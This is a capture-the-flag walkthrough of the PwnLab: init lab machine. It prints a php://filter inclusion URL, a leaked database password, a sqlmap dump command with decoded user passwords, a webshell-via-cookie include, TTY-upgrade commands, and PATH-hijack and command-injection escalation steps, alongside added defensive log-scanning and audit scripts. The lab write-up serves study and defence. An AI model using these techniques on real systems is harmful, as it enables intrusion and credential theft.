11 PwnLab: init target machine

Author: 沉云

Introduction

Target machine: https://www.vulnhub.com/entry/pwnlab-init,158/

Information gathering


Web penetration


Directory scanning


SQL injection at the login form


sqlmap failed here.

Check the request for sensitive fields


Tried accessing upload.php directly without authentication; that failed.

Tried file inclusion through the page parameter and found that files can be read.

File inclusion via the page parameter

Comparing the file names found by the directory scan with the values passed to page, it is easy to guess that a .php suffix is appended automatically to the page parameter.

Tried null-byte (%00) truncation, length truncation and truncation with the special URL character ?. All of them failed, but that does not mean there is no inclusion vulnerability here.

A PHP stream wrapper can be used to read some data:

```text
php://filter/convert.base64-encode/resource=index
http://192.168.200.151/?page=php%3a%2f%2ffilter%2fconvert.base64-encode%2fresource%3dindex
```

Read some of the key files found by the scan and base64-decode them.

index.php

```php
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
    if (isset($_GET['page']))
    {
        include($_GET['page'].".php");
    }
    else
    {
        echo "Use this server to upload and share image files inside the intranet";
    }
?>
</center>
</body>
</html>
```


config.php

```php
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
```

upload.php

```php
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
    <body>
        <form action='' method='post' enctype='multipart/form-data'>
            <input type='file' name='file' id='file' />
            <input type='submit' name='submit' value='Upload'/>
        </form>
    </body>
</html>
<?php
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png");

        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }
        if(strpos($filetype,'image') === false) {
            die('Error 001');
        }
        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }
        if(substr_count($filetype, '/')>1){
            die('Error 003');
        }

        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
            die('Error 4');
        }
    }
}
?>
```

The intended path is now fairly clear: connect to the database directly to obtain user credentials and log in to the site, upload a webshell through the upload function, and finally include that webshell through the lang variable in the cookie.
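The include at the bottom of index.php is what the wrapper URL above abuses, and every such request leaves a line in the web server's access log. As an added detection example (not code from the original post or from the PwnLab image), the Python script below parses constructed Apache combined-log lines and flags page= values that carry a stream wrapper, a path traversal or a null byte, or that are not one of the two pages index.php actually links to. The log lines, the client address and the page allowlist are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines modelled on the requests described in
# the post. They are sample data (made-up client address and timestamps),
# not the target's real logs.
SAMPLE_LOG = """\
192.168.200.10 - - [10/Jun/2021:14:54:01 +0800] "GET /?page=login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.200.10 - - [10/Jun/2021:14:55:12 +0800] "GET /?page=php%3a%2f%2ffilter%2fconvert.base64-encode%2fresource%3dindex HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.200.10 - - [10/Jun/2021:14:56:30 +0800] "GET /?page=../../../../etc/passwd%00 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.200.10 - - [10/Jun/2021:14:57:45 +0800] "GET /?page=upload HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.168.200.10 - - [10/Jun/2021:14:58:03 +0800] "POST /?page=login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed allowlist: the only page values index.php itself links to.
ALLOWED_PAGES = {"login", "upload"}

# scheme:// prefix catches php://, data://, expect://, http:// and friends.
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9.+-]*://', re.IGNORECASE)
# A ".." path component, with either slash style, anywhere in the value.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def classify_page(value):
    """Return the reasons a page= value looks like inclusion abuse ([] if benign)."""
    decoded = unquote(unquote(value))  # tolerate double URL-encoding
    reasons = []
    if WRAPPER_RE.match(decoded):
        reasons.append("stream wrapper")
    if TRAVERSAL_RE.search(decoded):
        reasons.append("path traversal")
    if "\x00" in decoded:
        reasons.append("null byte")
    if not reasons and decoded not in ALLOWED_PAGES:
        reasons.append("unknown page")
    return reasons


def scan_log(text):
    """Run classify_page over every page= value in an access log; return findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs splits on '&' and '=' before percent-decoding, so an
        # encoded '=' inside the wrapper string stays part of the value.
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for value in query.get("page", []):
            reasons = classify_page(value)
            if reasons:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "page": value,
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], ", ".join(f["reasons"]), repr(f["page"]))
```

The same classifier can be applied to the lang cookie used for the second include in index.php, provided the server's LogFormat records the Cookie request header (Apache's `%{Cookie}i`); by default the combined format does not.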

```shell
python3 sqlmap.py -d mysql://root:H4u%QJ_H99@192.168.200.151:3306/ -D Users --dump
```

The dumped table, with the base64 password column decoded:

```text
+------------------+--------+------------+
| pass             | user   | decoded    |
+------------------+--------+------------+
| aVN2NVltMkdSbw== | kane   | iSv5Ym2GRo |
| Sld6WHVCSkpOeQ== | kent   | JWzXuBJJNy |
| U0lmZHNURW42SQ== | mike   | SIfdsTEn6I |
+------------------+--------+------------+
```

Append the webshell to an image and upload it; including it through the cookie then executes commands.

![image-20210610182607393](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192909299-1977291421.png)

![image-20210610182627868](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192912276-676978966.png)

Listen locally with nc, then spawn a reverse shell.

![image-20210610191844817](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192914022-205796473.png)

Privilege escalation

After getting the reverse shell, obtain a full TTY shell with the following commands:

    python -c 'import pty;pty.spawn("/bin/bash")'
    export TERM=xterm
    [ctrl + z]
    stty raw -echo; fg
    stty rows 38 columns 116

First check whether there are configuration problems, then try vulnerability-based privilege escalation.

There are four users under /home, and the passwords for three of them are already known. Log in as each one and check for sensitive files.

![image-20210610184549354](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192916794-444969448.png)

User kane

![image-20210610184627125](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192918373-131157985.png)

![image-20210610184738064](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192925194-1040866567.png)

Tried library hijacking, but the target host does not have the strace command:

    strace msgmike 2>&1 | grep -i -E "(open|access)*no file"

Out of ideas, I checked a writeup, which hints that cat can be hijacked by modifying PATH.

![image-20210610185811067](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192928635-659584999.png)

![image-20210610190840409](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192931044-95307890.png)

This yields a shell as user mike.

User kent

No files worth noting.

![image-20210610185016857](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192932789-1968865353.png)

User mike

The password is wrong; login failed.

After obtaining a shell through msgmike in kane's home directory:

![image-20210610190940003](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192939983-1294083968.png)

Running it prompts for some input. Tried strings to look for sensitive content and found the following:

![image-20210610191034415](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192935318-1401618322.png)

This means the input is most likely substituted for the %s, which is a classic command injection.

![image-20210610191420206](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192936955-826353109.png)

![image-20210610191529986](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192941127-122934366.png)

![image-20210610191548409](https://img2020.cnblogs.com/blog/1512048/202106/1512048-20210610192944966-663854932.png)  
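Both escalation steps above come down to how a setuid program invokes its helpers: msgmike resolves cat through the caller's PATH, and the binary in mike's home interpolates user input into a command string. The Python audit below is an added example, not code from the post or from the target: it reports which PATH entries a caller could write to before the genuine program would be found, lists the characters an input validator in such a program must reject, and shows the invocation pattern that removes both problems (absolute path, argv list, no shell, PATH not inherited from the caller). The writable-directory model, the helper locations and the command lines are constructed assumptions.

```python
import os
import shlex
import subprocess
import sys

# Constructed model of the target host (assumption, not data from the post):
# directories the unprivileged caller can write to, and where the real helper
# programs live. On a live host swap in os.access / shutil.which (see below).
WRITABLE_BY_CALLER = {"/tmp", "/home/kane"}
REAL_LOCATION = {"cat": "/bin/cat", "echo": "/bin/echo"}

# Characters that end or extend a command when interpolated into a system() string.
SHELL_META = set(";|&$`<>()\n")


def path_hijack_exposure(command_line, path_env,
                         is_writable=lambda d: d in WRITABLE_BY_CALLER,
                         locate=REAL_LOCATION.get):
    """PATH entries, in search order, that the caller could plant a binary in
    before the real program would be found. Empty means PATH cannot be abused."""
    prog = shlex.split(command_line)[0]
    if "/" in prog:              # explicit path: the shell never consults PATH
        return []
    real = locate(prog)
    exposed = []
    for d in path_env.split(":"):
        if real is not None and d == os.path.dirname(real):
            break                # genuine program found here; later entries are irrelevant
        if is_writable(d):
            exposed.append(d)
    return exposed


def shell_metacharacters(user_input):
    """Characters in the input that a setuid program's validator must reject if
    the value is ever placed into a shell command string."""
    return sorted(c for c in set(user_input) if c in SHELL_META)


def run_fixed_program(program_abs_path, args):
    """Invoke a helper the way a privileged program should: absolute path,
    argv list (no shell, so metacharacters stay literal) and a PATH the
    caller cannot influence."""
    env = dict(os.environ, PATH="/usr/bin:/bin")
    return subprocess.run([program_abs_path, *args], capture_output=True,
                          text=True, env=env, check=False)


def echo_argument(user_input):
    """Pass the input to a child as one argument and return what the child saw.
    sys.executable stands in for /bin/echo so the example runs wherever Python does."""
    proc = run_fixed_program(
        sys.executable, ["-c", "import sys; print(sys.argv[1], end='')", user_input])
    return proc.stdout


if __name__ == "__main__":
    # Constructed command shapes mirroring the two binaries discussed above.
    print(path_hijack_exposure("cat /home/mike/msg.txt", "/tmp:/usr/local/bin:/usr/bin:/bin"))
    print(path_hijack_exposure("/bin/echo %s >> /root/messages.txt", "/tmp:/bin"))
    print(shell_metacharacters("hello; id"))
    print(echo_argument("hello; id"))
```

On a live host, call path_hijack_exposure with `is_writable=lambda d: os.access(d, os.W_OK)` and `locate=shutil.which` against the PATH a setuid binary would inherit; an empty result for every command it runs, plus an empty metacharacter list for every input it accepts, is the condition the fix has to reach.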
> Original author: 沉云
>
> Original link: https://www.cnblogs.com/starrys/p/14872491.html
